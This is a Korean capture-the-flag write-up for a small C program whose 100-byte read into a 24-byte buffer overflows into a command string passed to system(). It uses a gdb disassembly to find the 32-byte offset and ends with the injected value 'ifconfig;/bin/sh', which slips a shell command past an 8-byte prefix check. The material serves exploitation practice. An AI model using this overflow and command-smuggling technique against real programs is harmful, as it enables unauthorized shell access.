#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void init() {
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
}
int main()
{
char cmd_ip[256] = "ifconfig";
int dummy;
char center_name[24];
init();
printf("Center name: ");
read(0, center_name, 100);
if( !strncmp(cmd_ip, "ifconfig", 8)) {
system(cmd_ip);
}
else {
printf("Something is wrong!\n");
}
exit(0);
}
center_name에 100바이트를 받는다. 이 과정에서 오버플로우가 발생한다.
그리고 strncmp(cmd_ip, "ifconfig", 8)의 결과가 같아야 하는데, 그렇다면 cmd_ip를 실행한다고 한다.
우선 center_name에서 발생하는 BOF를 통해 cmd_ip를 건들 수 있다.
ifconfig인지 확인하는 조건문에서는 8바이트만을 검사하므로 "ifconfig"라는 문자열만 앞에 넣어주면 된다.
우리는 center_name과 cmd_ip까지 거리를 계산해야 한다.
gdb-peda$ disas main
Dump of assembler code for function main:
0x00000000000008ad <+0>: push rbp
0x00000000000008ae <+1>: mov rbp,rsp
0x00000000000008b1 <+4>: sub rsp,0x130
0x00000000000008b8 <+11>: mov rax,QWORD PTR fs:0x28
0x00000000000008c1 <+20>: mov QWORD PTR [rbp-0x8],rax
0x00000000000008c5 <+24>: xor eax,eax
0x00000000000008c7 <+26>: movabs rax,0x6769666e6f636669
0x00000000000008d1 <+36>: mov edx,0x0
0x00000000000008d6 <+41>: mov QWORD PTR [rbp-0x110],rax
0x00000000000008dd <+48>: mov QWORD PTR [rbp-0x108],rdx
0x00000000000008e4 <+55>: lea rdx,[rbp-0x100]
0x00000000000008eb <+62>: mov eax,0x0
0x00000000000008f0 <+67>: mov ecx,0x1e
0x00000000000008f5 <+72>: mov rdi,rdx
0x00000000000008f8 <+75>: rep stos QWORD PTR es:[rdi],rax
0x00000000000008fb <+78>: mov eax,0x0
0x0000000000000900 <+83>: call 0x86a <init>
0x0000000000000905 <+88>: lea rdi,[rip+0xf8] # 0xa04
0x000000000000090c <+95>: mov eax,0x0
0x0000000000000911 <+100>: call 0x710 <printf@plt>
0x0000000000000916 <+105>: lea rax,[rbp-0x130]
0x000000000000091d <+112>: mov edx,0x64
0x0000000000000922 <+117>: mov rsi,rax
0x0000000000000925 <+120>: mov edi,0x0
0x000000000000092a <+125>: call 0x720 <read@plt>
0x000000000000092f <+130>: lea rax,[rbp-0x110]
0x0000000000000936 <+137>: mov edx,0x8
0x000000000000093b <+142>: lea rsi,[rip+0xd0] # 0xa12
0x0000000000000942 <+149>: mov rdi,rax
0x0000000000000945 <+152>: call 0x6e0 <strncmp@plt>
0x000000000000094a <+157>: test eax,eax
0x000000000000094c <+159>: jne 0x95f <main+178>
0x000000000000094e <+161>: lea rax,[rbp-0x110]
0x0000000000000955 <+168>: mov rdi,rax
0x0000000000000958 <+171>: call 0x700 <system@plt>
0x000000000000095d <+176>: jmp 0x96b <main+190>
0x000000000000095f <+178>: lea rdi,[rip+0xb5] # 0xa1b
0x0000000000000966 <+185>: call 0x6f0 <puts@plt>
0x000000000000096b <+190>: mov edi,0x0
0x0000000000000970 <+195>: call 0x740 <exit@plt>
End of assembler dump.
read 호출 부분을 보면 rbp-0x130을 가져온다.
system과 strncmp를 보면 rbp-0x110을 본다.
0x20정도 차이남을 확인할 수 있다. 이는 32이다.
cmd_ip는 "ifconfig;/bin/sh"로 만들어지면 된다.
야호